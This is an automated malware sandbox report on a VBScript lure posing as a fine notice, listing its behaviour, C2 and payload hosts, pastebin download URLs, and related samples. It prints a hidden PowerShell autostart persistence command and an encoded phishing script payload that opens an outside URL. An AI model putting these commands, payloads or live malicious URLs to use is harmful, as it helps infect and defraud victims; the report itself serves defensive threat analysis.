                        Employee NamesVirtual Private ServerLocal Accounts3
                        PowerShell
                        Login HookLogin Hook1
                        DLL Side-Loading
                        NTDS2
                        Process Discovery
                        Distributed Component Object ModelInput Capture1
                        Non-Standard Port
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        File Deletion
                        LSA Secrets31
                        Virtualization/Sandbox Evasion
                        SSHKeylogging2
                        Non-Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading
                        Cached Domain Credentials1
                        Application Window Discovery
                        VNCGUI Input Capture113
                        Application Layer Protocol
                        Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                        Virtualization/Sandbox Evasion
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                        Process Injection
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1517277 Sample: Oficio notificacion multas ... Startdate: 24/09/2024 Architecture: WINDOWS Score: 100 66 pastebin.com 2->66 68 notificadoresrma.duckdns.org 2->68 70 3 other IPs or domains 2->70 84 Suricata IDS alerts for network traffic 2->84 86 Found malware configuration 2->86 88 Malicious sample detected (through community Yara rule) 2->88 94 16 other signatures 2->94 12 wscript.exe 1 2->12         started        15 cmd.exe 2->15         started        17 cmd.exe 2->17         started        signatures3 90 Connects to a pastebin service (likely for C&C) 66->90 92 Uses dynamic DNS services 68->92 process4 signatures5 108 VBScript performs obfuscated calls to suspicious functions 12->108 110 Suspicious powershell command line found 12->110 112 Wscript starts Powershell (via cmd or directly) 12->112 114 3 other signatures 12->114 19 powershell.exe 7 12->19         started        22 powershell.exe 15->22         started        24 conhost.exe 15->24         started        26 powershell.exe 17->26         started        28 conhost.exe 17->28         started        process6 signatures7 96 Suspicious powershell command line found 19->96 98 Very long command line found 19->98 100 Self deletion via cmd or bat file 19->100 106 5 other signatures 19->106 30 powershell.exe 14 17 19->30         started        35 conhost.exe 19->35         started        102 Writes to foreign memory regions 22->102 104 Injects a PE file into a foreign processes 22->104 37 conhost.exe 22->37         started        39 RegAsm.exe 22->39         started        41 conhost.exe 26->41         started        43 RegAsm.exe 26->43         started        process8 dnsIp9 76 desckvbrat.com.br 191.252.83.213, 21, 49704, 49705 LocawebServicosdeInternetSABR Brazil 30->76 78 pastecodeapp.vercel.app 76.76.21.22, 443, 49706, 49708 AMAZON-02US United States 30->78 64 C:\Users\user\AppData\Local\...\yoexw.ps1, Unicode 30->64 dropped 80 Self deletion via cmd or bat file 30->80 82 Adds a directory exclusion to Windows Defender 30->82 45 powershell.exe 11 30->45         started        49 cmd.exe 10 30->49         started        51 powershell.exe 23 30->51         started        53 3 other processes 30->53 file10 signatures11 process12 dnsIp13 74 pastebin.com 104.20.4.235, 443, 49712, 56146 CLOUDFLARENETUS United States 45->74 116 Writes to foreign memory regions 45->116 118 Injects a PE file into a foreign processes 45->118 55 RegAsm.exe 45->55         started        120 Suspicious powershell command line found 49->120 122 Wscript starts Powershell (via cmd or directly) 49->122 124 Loading BitLocker PowerShell Module 51->124 58 WmiPrvSE.exe 2 51->58         started        126 Creates autostart registry keys with suspicious values (likely registry only malware) 53->126 signatures14 process15 dnsIp16 72 notificadoresrma.duckdns.org 46.246.14.5, 2054, 56145 PORTLANEwwwportlanecomSE Sweden 55->72 60 cmd.exe 55->60         started        process17 process18 62 conhost.exe 60->62         started       

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        Oficio notificacion multas y sanciones.vbs3%ReversingLabsWin32.Trojan.Generic
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://nuget.org/NuGet.exe0%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                        https://go.micro0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://nuget.org/nuget.exe0%URL Reputationsafe
                        https://oneget.orgX0%URL Reputationsafe
                        https://aka.ms/pscore680%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        https://oneget.org0%URL Reputationsafe
                        http://www.apache.org/licenses/LICENSE-2.00%Avira URL Cloudsafe
                        http://www.microsoft.co0%Avira URL Cloudsafe
                        https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/raw0%Avira URL Cloudsafe
                        https://pastecodeapp.vXB0%Avira URL Cloudsafe
                        https://pastecodeapp.vercel.app0%Avira URL Cloudsafe
                        http://desckvbrat.com.br0%Avira URL Cloudsafe
                        https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/rawP0%Avira URL Cloudsafe
                        http://ftp.desckvbrat.com.br100%Avira URL Cloudmalware
                        http://crl.microsoft0%Avira URL Cloudsafe
                        http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                        https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/raw0%Avira URL Cloudsafe
                        https://aka.ms/pscore60%Avira URL Cloudsafe
                        https://pastebin.com/raw/pQQ0n3eA100%Avira URL Cloudmalware
                        https://firebasestorage.googleh0%Avira URL Cloudsafe
                        https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/rawP0%Avira URL Cloudsafe
                        https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/rawP0%Avira URL Cloudsafe
                        https://pastecodeapp.vX0%Avira URL Cloudsafe
                        https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/raw0%Avira URL Cloudsafe
                        https://github.com/Pester/Pester0%Avira URL Cloudsafe
                        http://pastecodeapp.vercel.app0%Avira URL Cloudsafe
                        https://pastebin.com0%Avira URL Cloudsafe
                        http://pastebin.com0%Avira URL Cloudsafe
                        http://crl.mdHy0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        pastecodeapp.vercel.app
                        76.76.21.22
                        truefalse
                          unknown
                          desckvbrat.com.br
                          191.252.83.213
                          truetrue
                            unknown
                            pastebin.com
                            104.20.4.235
                            truetrue
                              unknown
                              notificadoresrma.duckdns.org
                              46.246.14.5
                              truetrue
                                unknown
                                ftp.desckvbrat.com.br
                                unknown
                                unknowntrue
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/rawfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/rawfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://pastebin.com/raw/pQQ0n3eAfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/rawfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.2236815480.000001D3947B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2856145468.000001D3A2CD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2724257529.00000256AFA70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2661344132.000001F552490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65B7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F573ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.2178810552.0000020F56FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://pastecodeapp.vercel.apppowershell.exe, 00000004.00000002.2236815480.000001D392E83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39323F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://pastecodeapp.vXBpowershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://pastecodeapp.vercel.app/pastes/019220a5-2811-7ab8-829c-a7f4350452e0/rawPpowershell.exe, 00000004.00000002.2236815480.000001D3946E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2178810552.0000020F55D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.2200486936.000002569FC22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://crl.microsoftpowershell.exe, 00000002.00000002.3002434212.000001E2ED8B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2444391639.0000020A42535000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2262307910.0000020A28534000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2353901429.000002078DA85000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2420905012.0000020956705000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2178810552.0000020F55D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ftp.desckvbrat.com.brpowershell.exe, 00000004.00000002.2236815480.000001D394365000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://go.micropowershell.exe, 00000004.00000002.2236815480.000001D393C6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://desckvbrat.com.brpowershell.exe, 00000004.00000002.2236815480.000001D394365000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.microsoft.copowershell.exe, 00000005.00000002.2838267967.00000256B7D72000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2444391639.0000020A42535000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://aka.ms/pscore6powershell.exe, 00000002.00000002.2935786151.000001E2D5798000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2178810552.0000020F55D32000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://pastecodeapp.vercel.app/pastes/019220a3-9326-7b46-b740-ef110ecdb453/rawPpowershell.exe, 00000004.00000002.2236815480.000001D39323F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://pastecodeapp.vXpowershell.exe, 00000004.00000002.2236815480.000001D3946E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://pastecodeapp.vercel.app/pastes/01922156-0a1a-798a-ba18-d0ce12473978/rawPpowershell.exe, 00000004.00000002.2236815480.000001D39438F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.2200486936.000002569FC22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542643000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://contoso.com/powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2856145468.000001D3A2CD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2724257529.00000256AFA70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2661344132.000001F552490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65B7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F573ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2276224624.0000020F65CB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://oneget.orgXpowershell.exe, 00000008.00000002.2178810552.0000020F56FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://aka.ms/pscore68powershell.exe, 00000002.00000002.2935786151.000001E2D57AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D392C78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2200486936.000002569FA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F55B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A15D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A14F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078F6FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078F6E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.00000209588AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.00000209588BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://pastecodeapp.vercel.apppowershell.exe, 00000004.00000002.2236815480.000001D3943BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://firebasestorage.googlehpowershell.exe, 00000004.00000002.2236815480.000001D39475B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2935786151.000001E2D57DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2236815480.000001D392C78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2200486936.000002569FA01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2195084850.000001F542421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2178810552.0000020F55B01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A15D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078F73A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.00000209588A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://pastebin.compowershell.exe, 0000000C.00000002.2263158349.0000020A2A9C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078FF6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.0000020959130000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://pastebin.compowershell.exe, 0000000C.00000002.2263158349.0000020A2A709000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2263158349.0000020A2A9C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2358188672.000002078FC86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.000002095912A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2442574542.0000020958FB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.mdHypowershell.exe, 00000005.00000002.2847112726.00000256B7F77000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://oneget.orgpowershell.exe, 00000008.00000002.2178810552.0000020F56FCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  46.246.14.5
                                  notificadoresrma.duckdns.orgSweden
                                  42708PORTLANEwwwportlanecomSEtrue
                                  104.20.4.235
                                  pastebin.comUnited States
                                  13335CLOUDFLARENETUStrue
                                  191.252.83.213
                                  desckvbrat.com.brBrazil
                                  27715LocawebServicosdeInternetSABRtrue
                                  76.76.21.22
                                  pastecodeapp.vercel.appUnited States
                                  16509AMAZON-02USfalse
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1517277
                                  Start date and time:2024-09-24 23:41:05 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 20s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:29
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:Oficio notificacion multas y sanciones.vbs
                                  Detection:MAL
                                  Classification:mal100.spre.troj.spyw.expl.evad.winVBS@38/30@4/4
                                  EGA Information:
                                  • Successful, ratio: 30%
                                  HCA Information:
                                  • Successful, ratio: 98%
                                  • Number of executed functions: 101
                                  • Number of non-executed functions: 8
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbs
                                  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded IPs from analysis (whitelisted): 142.250.185.138, 172.217.16.202, 142.250.185.170, 142.250.186.106, 142.250.185.106, 142.250.184.202, 142.250.185.234, 216.58.206.74, 142.250.185.74, 142.250.186.170, 142.250.184.234, 142.250.185.202, 142.250.181.234, 142.250.186.138, 142.250.186.74, 172.217.16.138
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, firebasestorage.googleapis.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target RegAsm.exe, PID 7544 because it is empty
                                  • Execution Graph export aborted for target RegAsm.exe, PID 7788 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 1088 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 2748 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 5436 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 6388 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 6524 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: Oficio notificacion multas y sanciones.vbs
                                  TimeTypeDescription
                                  17:42:02API Interceptor107x Sleep call for process: powershell.exe modified
                                  17:42:55API Interceptor15125x Sleep call for process: RegAsm.exe modified
                                  23:42:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nyj cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                                  23:42:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nyj cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  46.246.14.5xzcQo6GenFVf.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                    xNZytGJGGReK.exeGet hashmaliciousRemcosBrowse
                                      9589-PDF.vbsGet hashmaliciousNjrat, PasteDownloaderBrowse
                                        104.20.4.235envifa.vbsGet hashmaliciousRemcosBrowse
                                        • pastebin.com/raw/V9y5Q5vv
                                        New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                        • pastebin.com/raw/NsQ5qTHr
                                        Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                        • pastebin.com/raw/NsQ5qTHr
                                        Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                        • pastebin.com/raw/NsQ5qTHr
                                        Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                        • pastebin.com/raw/NsQ5qTHr
                                        Update on Payment.jsGet hashmaliciousWSHRATBrowse
                                        • pastebin.com/raw/NsQ5qTHr
                                        191.252.83.213Bb65bKypZP.vbsGet hashmaliciousUnknownBrowse
                                          u30wlJmZuT.vbsGet hashmaliciousUnknownBrowse
                                            bF9JDHS47l.vbsGet hashmaliciousRemcosBrowse
                                              TPFK2rYosu.vbsGet hashmaliciousUnknownBrowse
                                                TDjIl6ldeJ.vbsGet hashmaliciousUnknownBrowse
                                                  0Zdq4t4SKO.vbsGet hashmaliciousUnknownBrowse
                                                    tMkxadpE7f.vbsGet hashmaliciousRemcosBrowse
                                                      tQthxQV78N.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                        osmAcHNA4D.exeGet hashmaliciousAsyncRAT, DcRat, Quasar, XWormBrowse
                                                          ELcnK80Ehf.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                            76.76.21.22http://netflix-clone-rho-rose.vercel.app/Get hashmaliciousUnknownBrowse
                                                            • netflix-clone-rho-rose.vercel.app/
                                                            http://axxn-5yor.vercel.app/blog1/Get hashmaliciousUnknownBrowse
                                                            • axxn-5yor.vercel.app/blog1/
                                                            http://telegram-fordating.vercel.app/Get hashmaliciousUnknownBrowse
                                                            • telegram-fordating.vercel.app/
                                                            http://get-verified--badge.vercel.app/Get hashmaliciousUnknownBrowse
                                                            • get-verified--badge.vercel.app/
                                                            http://facebook-clone-peach-delta.vercel.app/76.76.21.241Get hashmaliciousUnknownBrowse
                                                            • facebook-clone-peach-delta.vercel.app/76.76.21.241
                                                            http://airbnb-clone-5rqdfy035-aschrock11.vercel.app/Get hashmaliciousUnknownBrowse
                                                            • airbnb-clone-5rqdfy035-aschrock11.vercel.app/
                                                            http://netflix-clone-arbaz-31kqcgfnp-arbaz49.vercel.app/Get hashmaliciousUnknownBrowse
                                                            • netflix-clone-arbaz-31kqcgfnp-arbaz49.vercel.app/
                                                            http://mysterymint-s10.vercel.app/Get hashmaliciousUnknownBrowse
                                                            • mysterymint-s10.vercel.app/
                                                            http://mysterymint-s10.vercel.app/Get hashmaliciousUnknownBrowse
                                                            • mysterymint-s10.vercel.app/
                                                            http://mint-opensea-nft33.vercel.app/Get hashmaliciousUnknownBrowse
                                                            • mint-opensea-nft33.vercel.app/
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            pastebin.comsostener.vbsGet hashmaliciousNjratBrowse
                                                            • 104.20.3.235
                                                            bF9JDHS47l.vbsGet hashmaliciousRemcosBrowse
                                                            • 172.67.19.24
                                                            tMkxadpE7f.vbsGet hashmaliciousRemcosBrowse
                                                            • 172.67.19.24
                                                            tQthxQV78N.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                            • 104.20.4.235
                                                            osmAcHNA4D.exeGet hashmaliciousAsyncRAT, DcRat, Quasar, XWormBrowse
                                                            • 104.20.3.235
                                                            ELcnK80Ehf.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                            • 104.20.3.235
                                                            0n25lfPJxD.exeGet hashmaliciousAsyncRAT, DcRat, Quasar, XWormBrowse
                                                            • 104.20.3.235
                                                            aL8prAD2gL.jsGet hashmaliciousXWormBrowse
                                                            • 172.67.19.24
                                                            Nuovo Ordine.vbsGet hashmaliciousUnknownBrowse
                                                            • 172.67.19.24
                                                            S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                                            • 172.67.19.24
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            LocawebServicosdeInternetSABRBb65bKypZP.vbsGet hashmaliciousUnknownBrowse
                                                            • 191.252.83.213
                                                            u30wlJmZuT.vbsGet hashmaliciousUnknownBrowse
                                                            • 191.252.83.213
                                                            bF9JDHS47l.vbsGet hashmaliciousRemcosBrowse
                                                            • 191.252.83.213
                                                            TPFK2rYosu.vbsGet hashmaliciousUnknownBrowse
                                                            • 191.252.83.213
                                                            TDjIl6ldeJ.vbsGet hashmaliciousUnknownBrowse
                                                            • 191.252.83.213
                                                            0Zdq4t4SKO.vbsGet hashmaliciousUnknownBrowse
                                                            • 191.252.83.213
                                                            tMkxadpE7f.vbsGet hashmaliciousRemcosBrowse
                                                            • 191.252.83.213
                                                            tQthxQV78N.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                            • 191.252.83.213
                                                            osmAcHNA4D.exeGet hashmaliciousAsyncRAT, DcRat, Quasar, XWormBrowse
                                                            • 191.252.83.213
                                                            ELcnK80Ehf.exeGet hashmaliciousClipboard Hijacker, QuasarBrowse
                                                            • 191.252.83.213
                                                            AMAZON-02UShttp://www.hostmaster.amera.co.uk/images.php?p=177058987739%22%3E%3Cimg%20src%3D%22image.jpg%22%20onerror%3D%22var%20url1%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%20var%20url2%20%3D%20%5B%27http%3A%2F%2Fg%27%2C%27oog%27%2C%27le.com%27%2C%27%2F%27%2C%27%23%27%2C%27f%27%5D.join%28%27%27%29%3B%0D%0Avar%20url%20%3D%20%5B%27ht%27%2C%27tps%27%2C%27%3A%2F%2Fva%27%2C%27ult%27%2C%27dor%27%2C%27es.co%27%2C%27m%2F0%2F0%27%2C%27%2F0%2Fd%27%2C%2715a%27%2C%27d8%27%2C%27213%27%2C%277d5%27%2C%277d0%27%2C%278b%27%2C%27747%27%2C%27555%27%2C%27ec3%27%2C%277%27%2C%27539%27%2C%27e6/13/387-16277/1278-492099-29626%27%5D.join%28%27%27%29%3B%0D%0A%20url%20%3D%20url.replace%28%2F%2C%2Fg%2C%20%27%27%29%3B%20var%20win%20%3D%20window.open%28url%2C%20%27_self%27%29%3B%20win.opener%20%3D%20null%3B%20win.location.replace%28url%29%3B%22%3E#g92s2SFa9QJuB2UtlN4CGet hashmaliciousPhisherBrowse
                                                            • 3.253.250.90
                                                            http://icmtg.comGet hashmaliciousUnknownBrowse
                                                            • 176.34.133.63
